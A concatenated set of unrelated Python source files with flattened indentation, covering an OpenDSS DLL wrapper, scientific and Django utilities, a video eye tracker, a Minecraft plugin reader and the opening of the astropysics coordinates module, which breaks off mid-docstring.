from . import ActiveClass, Bus, CapControls, Capacitors, Circuit, CktElement, CMathLib, CtrlQueue, DSSElement
from . import DSSExecutive, DSSInterface, DSSProgress, DSSProperties, ErrorOpenDSS, Fuses, Generators, ISources
from . import LineCodes, Lines, Loads, LoadShapes, Meters, Monitors, Parallel, Parser, PDElements, PVSystems, Reclosers
from . import Relays, RegControls, Sensors, Settings, Solution, SWTControls, Text, Topology, Transformers, VSources
from . import XYCurves
from .utils.System import System
DLL_NAME_WIN = "OpenDSSDirect.dll"
DLL_NAME_LINUX = "libopendssdirect.so"
class DSSDLL(ActiveClass, Bus, CapControls, Capacitors, Circuit, CktElement, CMathLib, CtrlQueue, DSSElement,
DSSExecutive, DSSInterface, DSSProgress, DSSProperties, ErrorOpenDSS, Fuses, Generators, Lines, Loads,
ISources, LineCodes, LoadShapes, Meters, Monitors, Parallel, Parser, PDElements, PVSystems, Reclosers,
Relays, RegControls, Sensors, Settings, Solution, SWTControls, Text, Topology, Transformers, VSources,
XYCurves):
dll_folder: str
dll_path: str
my_dss_version: ctypes.c_char_p
dss_obj: ctypes.cdll
started = False
memory_commands = []
class_commands = []
# TODO need to be able to get different dll names:
# https://www.youtube.com/watch?v=74hCbYfdZdU&list=PLhdRxvt3nJ8x74v7XWcp6iLJL_nCOjxjK&index=9&t=2827s
def __init__(self, dll_folder_param=None, dll_by_user=None):
# TODO: dss_write_allowforms
"""
Class to create an OpenDSS object
:param dll_folder_param: None will use the OpenDSS available within the package. The dll path allows to use a
different OpenDSS
"""
self.started = False
if dll_folder_param is not None and dll_by_user is not None:
os.chdir(dll_folder_param)
self.dss_obj = ctypes.cdll.LoadLibrary(os.path.join(dll_folder_param, dll_by_user))
self.started = True
elif dll_by_user is None:
if dll_folder_param is None:
dll_folder_param = os.path.join(pathlib.Path(os.path.dirname(os.path.abspath(__file__))), "dll")
if System.detect_platform() == 'Linux':
dll_folder_param = pathlib.Path(dll_folder_param)
dll_by_user = DLL_NAME_LINUX
elif System.detect_platform() == 'Windows':
dll_folder_param = pathlib.Path(dll_folder_param)
dll_by_user = DLL_NAME_WIN
self.dll_path = System.get_architecture_path(dll_folder_param)
self.dll_file_path = os.path.join(self.dll_path, dll_by_user)
self.dss_obj = ctypes.cdll.LoadLibrary(self.dll_file_path)
self.started = True
# elif dll_folder_param is None and dll_by_user is not None:
# print("To specific a dll you MUST define the base folder")
# exit()
elif dll_folder_param is not None and dll_by_user is None:
print("Please specify a DLL in the defined folder.")
exit()
if self.started:
self.load_json()
self._allocate_memory()
if self.check_started():
print(
"OpenDSS Started successfully! \nOpenDSS {}\n\n".format(self.my_dss_version.value.decode('ascii')))
else:
print("OpenDSS Failed to Start")
exit()
else:
print("An error occur!")
exit()
def check_started(self):
if int(self.dss_obj.DSSI(ctypes.c_int32(3), ctypes.c_int32(0))) == 1:
# TODO: Need refactor this call to use a method that already exists
self.my_dss_version = ctypes.c_char_p(self.dss_obj.DSSS(ctypes.c_int32(1), "".encode('ascii')))
return True
else:
return False
def load_json(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(dir_path + '/' + 'configurations.json') as json_f:
data = json.load(json_f)
for n in data['structured_data']:
for t in n['types']:
if t == 'S':
ctype = 'c_char_p'
elif t == 'F':
ctype = 'c_double'
command_ = 'self.dss_obj.' + n['name'] + t + '.restype' + ' = ' + 'ctypes.' + ctype
self.memory_commands.append(command_)
def _allocate_memory(self):
self.dss_obj.DSSPut_Command.restype = ctypes.c_char_p
self.dss_obj.DSSProperties.restype = ctypes.c_char_p
for i in self.memory_commands:
exec(i)
|
n = int(input('Digite a quantidade de termos que você deseja saber da sequência de Fibonnaci: '))
n1 = 0
n2 = 1
c = 0
while c != n:
if c % 2 == 0:
print('{} -> '.format(n1), end='')
c += 1
n1 += n2
else:
print('{} -> '.format(n2), end='')
c += 1
n2 += n1
print('FIM') |
from libs.config import alias, set_namespace
from libs.myapp import clean_trace
# ? alias装饰器第一个参数为none_named_arg(true/FALSE),True即把没有参数名时传入的参数值顺序传入
@alias(func_alias="b", _type="COMMON")
def run():
"""
back
Back to main menu.
"""
clean_trace()
set_namespace("main")
|
import sys
import os.path
sys.path.append(os.path.curdir)
|
"""
A set of generic utilities used in bilby_pipe
"""
import re
import os
import sys
import logging
import ast
class BilbyPipeError(Exception):
def __init__(self, message):
super().__init__(message)
def get_command_line_arguments():
""" Helper function to return the list of command line arguments """
return sys.argv[1:]
def parse_args(input_args, parser):
""" Parse an argument list using parser generated by create_parser()
Parameters
----------
input_args: list
A list of arguments
Returns
-------
args: argparse.Namespace
A simple object storing the input arguments
unknown_args: list
A list of any arguments in `input_args` unknown by the parser
"""
if len(input_args) == 0:
raise BilbyPipeError("No command line arguments provided")
args, unknown_args = parser.parse_known_args(input_args)
return args, unknown_args
def check_directory_exists_and_if_not_mkdir(directory):
""" Checks if the given directory exists and creates it if it does not exist
Parameters
----------
directory: str
Name of the directory
"""
if not os.path.exists(directory):
os.makedirs(directory)
logger.debug("Making directory {}".format(directory))
else:
logger.debug("Directory {} exists".format(directory))
def setup_logger(outdir=None, label=None, log_level="INFO", print_version=False):
""" Setup logging output: call at the start of the script to use
Parameters
----------
outdir, label: str
If supplied, write the logging output to outdir/label.log
log_level: str, optional
['debug', 'info', 'warning']
Either a string from the list above, or an integer as specified
in https://docs.python.org/2/library/logging.html#logging-levels
print_version: bool
If true, print version information
"""
if "-v" in sys.argv:
log_level = "DEBUG"
if type(log_level) is str:
try:
level = getattr(logging, log_level.upper())
except AttributeError:
raise ValueError("log_level {} not understood".format(log_level))
else:
level = int(log_level)
logger = logging.getLogger("bilby_pipe")
logger.propagate = False
logger.setLevel(level)
streams = [type(h) == logging.StreamHandler for h in logger.handlers]
if len(streams) == 0 or not all(streams):
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(
logging.Formatter(
"%(asctime)s %(name)s %(levelname)-8s: %(message)s", datefmt="%H:%M"
)
)
stream_handler.setLevel(level)
logger.addHandler(stream_handler)
if any([type(h) == logging.FileHandler for h in logger.handlers]) is False:
if label:
if outdir:
check_directory_exists_and_if_not_mkdir(outdir)
else:
outdir = "."
log_file = "{}/{}.log".format(outdir, label)
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(
logging.Formatter(
"%(asctime)s %(levelname)-8s: %(message)s", datefmt="%H:%M"
)
)
file_handler.setLevel(level)
logger.addHandler(file_handler)
for handler in logger.handlers:
handler.setLevel(level)
if print_version:
version = get_version_information()
logger.info("Running bilby_pipe version: {}".format(version))
def get_version_information():
version_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)), "bilby_pipe/.version"
)
try:
with open(version_file, "r") as f:
return f.readline().rstrip()
except EnvironmentError:
print("No version information file '.version' found")
def convert_string_to_dict(string, key):
""" Convert a string repr of a string to a python dictionary
Parameters
----------
string: str
The strng to convert
key: str
A key, used for debugging
"""
string = strip_quotes(string)
# Convert equals to colons
string = string.replace("=", ":")
# Force double quotes around everything
string = re.sub('(\w+)\s?:\s?("?[^,"}]+"?)', '"\g<1>":"\g<2>"', string) # noqa
# Evaluate as a dictionary of str: str
try:
dic = ast.literal_eval(string)
except ValueError as e:
raise BilbyPipeError("Error {}. Unable to parse {}: {}".format(e, key, string))
# Convert values to floats/ints where possible
for key in dic:
dic[key] = string_to_int_float(dic[key])
return dic
def strip_quotes(string):
try:
return string.replace('"', "").replace("'", "")
except AttributeError:
return string
def string_to_int_float(s):
try:
return int(s)
except ValueError:
try:
return float(s)
except ValueError:
return s
setup_logger(print_version=True)
logger = logging.getLogger("bilby_pipe")
|
''' Logic on how information is invalidated in cascade. It is used by
validation-type nodes and patch requests '''
from cacahuate.errors import EndOfProcess
def get_ref_index(state, node, actor, ref, index):
forms = state['state']['items'][node]['actors']['items'][actor]['forms']
ref_forms = [
i for (i, form) in enumerate(forms) if form['ref'] == ref
]
if int(index) in ref_forms:
return ref_forms.index(int(index))
return None
def cascade_invalidate(xml, state, invalidated, comment):
''' computes a set of fields to be marked as invalid given the
original `invalidated` set of fields. '''
# because this could cause a recursive import
from cacahuate.node import make_node
# find the first node that is invalid and select it
set_values = {
i['ref']: {
'value': i['value'],
'value_caption': i['value_caption'],
}
for i in invalidated
if 'value' in i
}
invalid_refs = set(
i['ref']
for i in invalidated
)
xmliter = iter(xml)
for element in xmliter:
node = make_node(element, xmliter)
more_fields = node.get_invalidated_fields(invalid_refs, state)
invalid_refs.update(more_fields)
# computes the keys and values to be used in a mongodb update to set the
# fields as invalid
updates = dict()
for key in invalid_refs:
node, actor, form, input = key.split('.')
index, ref = form.split(':')
ref_index = get_ref_index(
state=state,
node=node,
actor=actor,
ref=ref,
index=index,
)
node_path = 'state.items.{node}'.format(node=node)
comment_path = node_path + '.comment'
node_state_path = node_path + '.state'
actor_path = node_path + '.actors.items.{actor}'.format(actor=actor)
actor_state_path = actor_path + '.state'
form_path = actor_path + '.forms.{index}'.format(index=index)
form_state_path = form_path + '.state'
input_path = form_path + '.inputs.items.{input}'.format(input=input)
input_state_path = input_path + '.state'
input_value_path = input_path + '.value'
input_caption_path = input_path + '.value_caption'
values_input_path = 'values.{ref}.{ref_index}.{input}'.format(
ref=ref,
ref_index=ref_index,
input=input,
)
# inputs
input_state = 'valid' if key in set_values else 'invalid'
updates[input_state_path] = input_state
if key in set_values:
updates[input_value_path] = set_values[key]['value']
updates[input_caption_path] = set_values[key]['value_caption']
if ref_index is not None:
updates[values_input_path] = set_values[key]['value']
# forms
if input_state == 'valid' and (
form_state_path not in updates or
updates[form_state_path] == 'valid'):
form_state = 'valid'
else:
form_state = 'invalid'
updates[form_state_path] = form_state
# actors
if form_state == 'valid' and (
actor_state_path not in updates or
updates[actor_state_path] == 'valid'):
actor_state = 'valid'
else:
actor_state = 'invalid'
updates[actor_state_path] = actor_state
# nodes
if actor_state == 'valid' and (
node_state_path not in updates or
updates[node_state_path] == 'valid'):
node_state = 'valid'
else:
node_state = 'invalid'
updates[node_state_path] = node_state
updates[comment_path] = comment
return updates
def track_next_node(xml, state, mongo, config):
''' given an xml and the current state, returns the first invalid or
unfilled node following the xml's ruleset (conditionals) '''
from cacahuate.node import make_node
xmliter = iter(xml)
node = make_node(next(xmliter), xmliter)
if node.id in state['state']['items']:
node_state = state['state']['items'][node.id]['state']
if node_state in ('invalid', 'unfilled'):
return node
try:
while True:
node = node.next(
xml,
state,
mongo,
config,
skip_reverse=True,
)
if node.id in state['state']['items']:
if state['state']['items'][node.id]['state'] == 'valid':
continue
return node
except StopIteration:
# End of process
raise EndOfProcess
|
__title__ = 'Website Colors'
|
from optparse import make_option
from django.core.management import BaseCommand, CommandError
from django.core.validators import URLValidator
from django.conf import settings
from django.utils.translation import ugettext as _
from apiclient.discovery import build
from apiclient.errors import HttpError
from psi.models import PageInsight, RuleResult, Screenshot
from django.core.exceptions import ValidationError
class Command(BaseCommand):
help = "Create PageSpeedInsights for a given URL."
option_list = BaseCommand.option_list + (
make_option("--url", "-u", action="store", dest="url",
help="The URL of the page for which the PageSpeed Insights API should generate results."),
make_option("--strategy", "-s", action="store", dest="strategy", default="desktop",
help="The strategy to use when analyzing the page. Valid values are desktop and mobile."),
make_option("--locale", "-l", action="store", dest="locale", default="en_US",
help="The locale that results should be generated in. See the list of supported locales. If the specified locale is not supported, the default locale is used."),
make_option("--rule", "-r", action="store", dest="rule",
help="The PageSpeed rules to run. Can be specified multiple times (for example, &rule=AvoidBadRequests&rule=MinifyJavaScript) to request multiple rules. If unspecified, all rules for the current strategy are used. Most users of the API should not need to specify this parameter."),
make_option("--key", "-k", action="store", dest="key",
help="The Google developer API key used when making the request. Unless Specified defaults to use the free tier on PageSpeed Insights. Good for getting a feel for how well this tool works for you."),
make_option("--console", "-c", action="store_true", default=False, dest="console",
help="Output the results to the console."),
make_option("--screenshot", "-i", action="store_true", default=False, dest="screenshot",
help="Indicates if binary data containing a screenshot should be included."),
)
def _processScreenshot(self, data, pageInsight):
screenshot = Screenshot()
screenshot.width = data.get('width', 0)
screenshot.height = data.get('height', 0)
screenshot.mime_type = data.get('mime_type', None)
screenshot.data = data.get('data', None)
screenshot.pageInsight = pageInsight
screenshot.save()
def _processRules(self, data, pageInsight):
for key in data:
ruleResult = RuleResult()
ruleResult.title = data[key]['localizedRuleName']
ruleResult.impact = data[key]['ruleImpact']
ruleResult.description = data[key]['urlBlocks'][0]['header']['format']
ruleResult.pageInsight = pageInsight
ruleResult.save()
def _processPageInsight(self, data):
pageInsight = PageInsight()
pageInsight.json = data
pageInsight.responseCode = data["responseCode"]
pageInsight.title = data["title"]
pageInsight.score = data["score"]
pageInsight.url = data['id']
pageInsight.numberResources = data['pageStats']["numberResources"]
pageInsight.numberHosts = data['pageStats']["numberHosts"]
pageInsight.totalRequestBytes = int(data['pageStats']["totalRequestBytes"])
pageInsight.numberStaticResources = data['pageStats']["numberStaticResources"]
pageInsight.htmlResponseBytes = int(data['pageStats']["htmlResponseBytes"])
pageInsight.cssResponseBytes = int(data['pageStats'].get("cssResponseBytes", 0))
pageInsight.imageResponseBytes = int(data['pageStats'].get("imageResponseBytes", 0))
pageInsight.javascriptResponseBytes = int(data['pageStats'].get("javascriptResponseBytes", 0))
pageInsight.otherResponseBytes = int(data['pageStats'].get("otherResponseBytes", 0))
pageInsight.numberJsResources = int(data['pageStats'].get("numberJsResources", 0))
pageInsight.numberCssResources = int(data['pageStats'].get("numberCssResources", 0))
pageInsight.screenshot = data.get('screenshot', None)
pageInsight.strategy = self.strategy
pageInsight.save()
return pageInsight
def _processPageStats(self, data, pageInsight):
pageStat = PageStats()
pageStat.numberResources = data["numberResources"]
pageStat.numberHosts = data["numberHosts"]
pageStat.totalRequestBytes = int(data["totalRequestBytes"])
pageStat.numberStaticResources = data["numberStaticResources"]
pageStat.htmlResponseBytes = int(data["htmlResponseBytes"])
pageStat.cssResponseBytes = int(data["cssResponseBytes"])
pageStat.imageResponseBytes = int(data["imageResponseBytes"])
pageStat.javascriptResponseBytes = int(data["javascriptResponseBytes"])
pageStat.otherResponseBytes = int(data["otherResponseBytes"])
pageStat.numberJsResources = int(data["numberJsResources"])
pageStat.numberCssResources = int(data["numberCssResources"])
pageStat.pageInsight = pageInsight
pageStat.save()
return pageStat
def _process_results(self, data):
pageInsight = self._processPageInsight(data)
self._processRules(data['formattedResults']['ruleResults'], pageInsight)
if self.screenshot:
self._processScreenshot(data['screenshot'], pageInsight)
if self.console:
self._console_report(pageInsight)
def _console_report(self, pageInsight):
print "\n" + _("PageSpeed Insights")
print "--------------------------------------------\n"
print "URL: \t\t\t%s" % pageInsight.url
print "Strategy: \t\t%s" % pageInsight.strategy
print "Score: \t\t\t%s\n" % pageInsight.score
print "--------------------------------------------"
for field in pageInsight._meta.get_all_field_names():
if field not in ('json', 'ruleresult', 'screenshot', 'score', 'url', 'strategy', 'id', 'title', 'created_date'):
print "%s\t\t\t%s" % (field, pageInsight._meta.get_field(field).value_from_object(pageInsight))
print "--------------------------------------------\n"
for result in pageInsight.ruleresult_set.all():
print "%s\t\t\t%s" % (result.title, result.impact)
print "\n"
def handle(self, *args, **options):
try:
urls = []
url = options.get('url')
if url:
urls.append(url)
else:
surls = getattr(settings, 'PSI_URLS', None)
if surls:
for url in surls:
urls.append(url)
else:
raise BaseException("No URLs provided. Please either pass a URL as an argument or define PSI_URLS in settings file.")
self.console = options.get('console')
self.screenshot = options.get('screenshot')
self.strategy = options.get('strategy')
locale = options.get('locale')
rule = options.get('rule')
key = options.get('key')
if options.get('key', False):
key = getattr(settings, 'GOOGLE_API_KEY', None)
service = build(serviceName='pagespeedonline', version='v1', developerKey=key)
for url in urls:
try:
URLValidator(url)
except ValidationError, e:
raise e
results = service.pagespeedapi().runpagespeed(url=url, strategy=self.strategy, locale=locale, rule=rule, screenshot=self.screenshot).execute()
self._process_results(results)
except HttpError, e:
raise e
except Exception, e:
raise CommandError(e.message)
|
import pandas as pd
import numpy as np
import random
## Hurst
def hurst_series(x, N):
def _hurst(x):
segs = 4.00 #5.0
N = len(x)
mlarge = np.floor(N/segs)
M = np.array([np.floor(np.logspace(0,np.log10(mlarge),50))])
M = np.unique(M[M>1])
n = len(M)
cut_min = int(np.ceil(n/10.0))
cut_max = int(np.floor(6.0*n/10.0))
V= np.zeros(n)
for i in range(n):
m = int(M[i])
k = int(np.floor(N/m))
matrix_sequence = np.array(x[:m*k]).reshape((k,m))
V[i] = np.var(np.sum(matrix_sequence,1)/float(m))
x = np.log10(M)
y = np.log10(V)
y1 = -x+y[0]+x[0]
X = x[cut_min:cut_max]
Y = y[cut_min:cut_max]
p1 = np.polyfit(X,Y,1)
Yfit = np.polyval(p1,X)
yfit = np.polyval(p1,x)
beta = -(Yfit[-1]-Yfit[0])/(X[-1]-X[0]);
H = 1.0-beta/2.0
return H
if len(x) < N:
return (pd.Series(index = x.index,data = np.NaN))
v = np.zeros(len(x) - N + 1)
for i in range(len(x) - N +1):
# print i, x[i:i+N]
v[i] = _hurst( x[i:i+N] )
return pd.Series(index = x.index,data=np.append((N-1)*[np.NaN],v))
|
# The sender's email :
from_email = '' # 'example@gmail.com' - (must be a gmail account)
from_email_password = '' # 'password'
# The reciever's email :
to_email = '' # 'example@example.com'
|
#!/usr/bin/env python
"""Video eye tracking
Usage:
vid_track <vid.mov> <behave.csv> [--box <x,y,w,h>] [--dur <len_secs>] [--start <start_secs>] [--method <method>] [--fps <fps>]
vid_track methods
vid_track (-h | --help)
vid_track --version
Options:
--box POS initial pos of box containing pupil. csv like x,y,w,h. no spaces. [default: 64,46,70,79]
--dur SECS Only run for SECS of the video [default: 9e9]
--method METH Eye tracking method [default: kcf]
--start SECS time to start [default: 0]
--fps FPS frames per second [default: 60]
-h --help Show this screen.
--version Show version.
Example:
./cli.py input/run1.mov input/10997_20180818_mri_1_view.csv --start 6 --dur 6
"""
from docopt import docopt
from tracker import auto_tracker
from extraction import extraction
if __name__ == '__main__':
args = docopt(__doc__, version='VidTrack 0.1')
# print(args); exit()
init_box = tuple([int(x) for x in args['--box'].split(',')])
print(init_box)
fps = int(args['--fps'])
start_frame = int(args['--start']) * fps
max_frames=int(args['--dur']) * fps + start_frame
tracker_name=args["--method"]
track = auto_tracker(args['<vid.mov>'], init_box,
write_img=False,
tracker_name=tracker_name, max_frames=max_frames,
start_frame=start_frame)
track.set_events(args['<behave.csv>'])
track.run_tracker()
track.annotated_plt()
|
import zipfile
from os import listdir
from os.path import isfile, join
import yaml
import asyncio
from flask import current_app
from .util import Loggers
async def get_plugins():
plugins = []
plugin_path = current_app.config['MINECRAFT_PLUGIN_FOLDER']
plugin_files = [f for f in listdir(
plugin_path) if isfile(join(plugin_path, f))]
for jar_file in plugin_files:
try:
f = zipfile.ZipFile(join(plugin_path,jar_file), 'r')
if 'plugin.yml' in f.namelist():
plugin_file = f.open('plugin.yml', 'r')
plugin_yaml = yaml.load(plugin_file, Loader=yaml.FullLoader)
plugin_name = plugin_yaml['name']
plugin_version = plugin_yaml['version']
plugins.append((plugin_name, plugin_version, jar_file))
except Exception as e:
Loggers.Error.error("Error in:"+ jar_file)
Loggers.Error.error(e)
pass
plugins.sort()
return plugins
|
#Copyright 2008 Erik Tollerud
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains classes representing coordinates in spatial, celestial, and
terrestrial coordinate systems, as well as implementations of transformations
between many of the coordinate systems. There are also utility functions for
easy-of-use of some of these classes.
The coordinate system framework is designed to allow users to add their own
coordinate systems easily, if desired, and implement transformations between
theirs and the builtin coordinate systems. This is implemented through the
transformation registry static methods of the :class:`CoordinateSystem` class
(e.g. :meth:`CoordinateSystem.registerTransform`).
Examples
^^^^^^^^
A common task might be to convert coordinates from one standard coordinate
system to another. The coords module makes this simple::
>>> from astropysics.coords import ICRSCoordinates,GalacticCoordinates
>>> gcoords = ICRSCoordinates('2h34m12.32s',12.3).convert(GalacticCoordinates)
>>> print gcoords
GalacticCoordinates: l=158.558650,b=-43.350066
>>> print '%.3f'%gcoords.l.degrees
158.559
>>> print '%.3f'%gcoords.l.radians
2.767
>>> print gcoords.b.getDmsStr(canonical=True)
-43:21:00.24
Note the initial input composed of an hours,minutes,seconds string input for the
RA, and a float for the dec -- :class:`EquatorialCoordinate` objects contain a
powerful parsing system that accepts most standard astronomical representations.
The resulting :class:`GalacticCoordinates` object's coordinates can then be
accessed in any of the various ways supported by the :class:`AngularCoordinate`
object.
.. warning::
Errors are not currently propogated in all coordinate transforms - this
will be corrected eventually, but for now you should check to make sure
errors propogate for any coordinate transform you want to perform.
{transformdiagram}
Classes and Inheritance Structure
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. inheritance-diagram:: astropysics.coords.coordsys
:parts: 1
Module API
^^^^^^^^^^
"""
#TODO: implement polar motion lookup techniques
from __future__ import division,with_statement
from ..constants import pi
from ..utils import add_docs
import numpy as np
_twopi = 2*pi
_pio2 = pi/2
try:
#requires Python 2.6
from abc import ABCMeta
from abc import abstractmethod
from abc import abstractproperty
from collections import Sequence,MutableSequence
except ImportError: #support for earlier versions
abstractmethod = lambda x:x
abstractproperty = property
ABCMeta = type
class MutableSequence(object):
__slots__=('__weakref__',) #support for weakrefs as necessary
class Sequence(object):
__slots__=('__weakref__',) #support for weakrefs as necessary
class AngularCoordinate(object):
"""
A class representing an angular value.
Arithmetic operators can be applied to the coordinate, and will be applied
directly to the numerical value in radians. For + and -, two angular
coordinates may be used, although for -, an AngularSeparation object will
be returned.
"""
import re as _re
__slots__=('_decval','_range')
#this disturbingly complex RE matches anything that looks like a standard sexigesimal or similar string
__acregex = _re.compile(r'(?:([+-])?(\d+(?:[.]\d*)?)(hours|h|degrees|d|radians|rads|rad|r| |:(?=\d+:\d+[.]?\d*$)))?(?:(\d+(?:[.]\d*)?)(m|\'|[:]| ))?(?:(\d+(?:[.]\d*)?)(s|"|$))?$')
#and this one matches all things that look like raw numbers
__decregex = _re.compile(r'[+-]?\d+([.]\d*)?$')
def __init__(self,inpt=None,sghms=None,range=None,radians=False):
"""
The input parser is very adaptable, and can be in any of the following
forms for `inpt`:
* A float value
if `radians` is True, this will be interpreted as decimal radians,
otherwise, it is in degrees.
* An :class:`AngularCoordinate` object
A copy of the input object will be created.
* None
The default of 0 will be used.
* A 3-tuple
If `sghms` is True, the tuple will be interpreted as
(hours,min,sec), otherwise, (degrees,min,sec).
* A string of the form ##.##
If `radians` is True, this will be cast to a float and used as
decimal radians, otherwise, it is in degrees.
* A string of the form ##.##d or ##.##degrees
The numerical part will be cast to a float and used as degrees.
* A string of the form ##.##h or ##.##hours
The numerical part will be cast to a float and used as hours.
* A string of the form ##.##radians,##.##rads, or ##.##r
The numerical part will be cast to a float and used as radians.
* A string of the form (+/-)##h##m##.##s
The numerical parts will be treated as hours,minutes, and seconds.
* A string of the form (+/-)##d##m##.##s or (+/-)##d##'##.##"
The numerical parts will be treated as degrees,minutes, and seconds.
* A string of the form (+/-)##:##:##.## or (+/-)## ## ##.##
Sexigesimal form. If `sghms` is None the presence of a a + or - sign
idicates that it should be interpreted as degrees, minutes, and
seconds. If the sign is absent, the numerical portions will be
treated as hours,min,sec. thewise, if `sghms` evaluates to True, the
numerical parts will be treated as hours,minutes, and seconds, and
if `sghms` evaluates to False, degrees,minutes, and seconds.
:param inpt: The coordinate value -- valid forms are described above.
:param sghms:
If True, ambiguous sexigesimal inputs should be hours, minutes, and
seconds instead of degrees,arcmin, and arcsec
:type sghms: boolean
:param range:
Sets the valid range of coordinates. Either a
2-sequence (lowerdegrees,upperdegrees) or None (for no limit)
:param radians:
If True, ambiguous inputs are treated as radians rather than
degrees.
:type radians: boolean
**Examples**
>>> from math import pi
>>> ac = AngularCoordinate(2.5)
>>> print ac
+2d30'00.00"
>>> print AngularCoordinate(ac)
+2d30'00.00"
>>> print AngularCoordinate(pi,radians=True)
+180d00.00"
>>> print AngularCoordinate('1.1')
+1d6'00.00"
>>> print AngularCoordinate('1.1',radians=True)
+63d1'31.29"
>>> print AngularCoordinate('12d25m12.5s')
+12d25'12.50"
>>> print AngularCoordinate('3:30:30',sghms=True)
+52d37'30.00"
>>> print AngularCoordinate('3:30:30',sghms=False)
+3d30'30.00"
>>> print AngularCoordinate('-3:30:30',sghms=None)
-3d30'30.00"
>>> print AngularCoordinate('+3:30:30',sghms=None)
+3d30'30.00"
>>> print AngularCoordinate('3:30:30',sghms=None)
+52d37'30.00"
"""
from operator import isSequenceType
self._range = None
if isinstance(inpt,AngularCoordinate):
self._decval = inpt._decval
self._range = inpt._range
return
elif inpt is None:
self._decval = 0
elif isinstance(inpt,basestring):
sinpt = inpt.strip()
decm = self.__decregex.match(sinpt)
if decm:
if radians:
self.radians = float(decm.group(0))
else:
self.degrees = float(decm.group(0))
else:
acm = self.__acregex.match(sinpt)
if acm:
sgn,dec1,mark1,dec2,mark2,dec3,mark3 = acm.group(1,2,3,4,5,6,7)
val = (0 if dec1 is None else float(dec1)) + \
(0 if dec2 is None else float(dec2)/60) + \
(0 if dec3 is None else float(dec3)/3600)
if sgn == '-':
val *= -1
if mark1 == ':' or mark1 == ' ':
if sghms is None:
if sgn is None:
self.hours = val
else: #'+' or '-'
self.degrees = val
elif sghms:
self.hours = val
else:
self.degrees = val
elif mark1 == 'hours' or mark1 == 'h':
self.hours = val
elif mark1 == 'degrees' or mark1 == 'd':
self.degrees = val
elif mark1 == 'radians' or mark1 == 'rad' or mark1 == 'rads' or mark1=='r':
self.radians = val
else:
try:
if radians:
self.radians = float(val)
else:
self.degrees = float(val)
except ValueError:
raise ValueError('invalid string input for AngularCoordinate')
else:
raise ValueError('Invalid string input for AngularCoordinate: '+inpt)
elif isSequenceType(inpt) and len(inpt)==3:
if sghms:
self.hrsminsec = inpt
else:
self.degminsec = inpt
elif radians:
self._decval = float(inpt)
else:
from math import radians
self._decval = radians(inpt)
self.range = range
def _setDegminsec(self,dms):
if not hasattr(dms, '__iter__') or len(dms)!=3:
raise ValueError('Must set degminsec as a length-3 iterator')
self.degrees = abs(dms[0])+abs(dms[1])/60.+abs(dms[2])/3600.
if dms[0]<0:
self._decval*=-1
def _getDegminsec(self):
fulldeg = abs(self.degrees)
deg = int(fulldeg)
fracpart = fulldeg-deg
min = int(fracpart*60.)
sec = fracpart*3600.-min*60.
return -deg if self.degrees < 0 else deg,min,sec
degminsec = property(_getDegminsec,_setDegminsec,doc="""
The value of this :class:`AngularCoordinate` as an (degrees,minutes,seconds)
tuple, with degrees and minutes as integers and seconds as a float.
""")
dms = degminsec
def _setHrsminsec(self,dms):
if not hasattr(dms, '__iter__') or len(dms)!=3:
raise ValueError('Must set hrsminsec as a length-3 iterator')
self.degrees = 15*(dms[0]+dms[1]/60.+dms[2]/3600.)
def _getHrsminsec(self):
factorized = self.degrees/15.
hrs = int(factorized)
mspart = factorized - hrs
min = int(mspart*60.)
sec = mspart*3600.-min*60.
return hrs,min,sec
hrsminsec = property(_getHrsminsec,_setHrsminsec,doc="""
The value of this :class:`AngularCoordinate` as an (hours,minutes,seconds)
tuple, with hours and minutes as integers and seconds as a float.
""")
hms = hrsminsec
def _setDecdeg(self,deg):
rads = deg*pi/180.
if self.range is not None:
rads = self._checkRange(rads)
self._decval = rads
def _getDecdeg(self):
return self._decval*180/pi
degrees = property(_getDecdeg,_setDecdeg,doc="""
The value of this :class:`AngularCoordinate` in decimal degrees.
""")
d = degrees
def _setRad(self,rads):
if self.range is not None:
rads = self._checkRange(rads)
self._decval = rads
def _getRad(self):
return self._decval
radians = property(_getRad,_setRad,doc="""
The value of this :class:`AngularCoordinate` in decimal radians.
""")
r = radians
def _setDechr(self,hr):
rads = hr*pi/12
if self.range is not None:
rads = self._checkRange(rads)
self._decval = rads
def _getDechr(self):
return self._decval*12/pi
hours = property(_getDechr,_setDechr,doc="""
The value of this :class:`AngularCoordinate` in decimal hours.
""")
h = hours
def _checkRange(self,rads):
"""
Checks if the input value is in range - returns the new value, or raises
a :exc:`ValueError`.
"""
if self._range is not None:
low,up,cycle = self._range
if cycle is None:
if low <= rads <= up:
return rads
else:
raise ValueError('Attempted to set angular coordinate outside range')
else:
if cycle > 0:
#this means use "triangle wave" pattern with the given quarter-period
from math import sin,asin
offset = low/(low-up)-0.5
return (up-low)*(asin(sin(pi*(2*rads/cycle+offset)))/pi+0.5)+low
else:
return (rads-low)%(up-low)+low
else:
return rads
def _setRange(self,newrng):
oldrange = self._range
try:
if newrng is None:
self._range = None
else:
from math import radians
newrng = tuple(newrng)
if len(newrng) == 2:
if newrng[1]-newrng[0] == 360:
newrng = (newrng[0],newrng[1],0)
else:
newrng = (newrng[0],newrng[1],None)
elif len(newrng)==3:
pass
else:
raise TypeError('range is not a 2 or 3-sequence')
if newrng[0] > newrng[1]:
raise ValueError('lower edge of range is not <= upper')
newrng = ( radians(newrng[0]),radians(newrng[1]), \
None if newrng[2] is None else radians(newrng[2]) )
self._range = newrng
self._decval = self._checkRange(self._decval)
except ValueError,e:
self._range = oldrange
if e.args[0] == 'lower edge of range is not <= upper':
raise e
else:
raise ValueError('Attempted to set range when value is out of range')
def _getRange(self):
if self._range is None:
return None
else:
from math import degrees
if self._range[2] is None:
return degrees(self._range[0]),degrees(self._range[1])
else:
return degrees(self._range[0]),degrees(self._range[1]),degrees(self._range[2])
range = property(_getRange,_setRange,doc="""
The acceptable range of angles for this :class:`AngularCoordinate`. This can
be set as a 2-sequence (lower,upper), or as a 3-sequence (lower,upper,cycle),
where cycle can be :
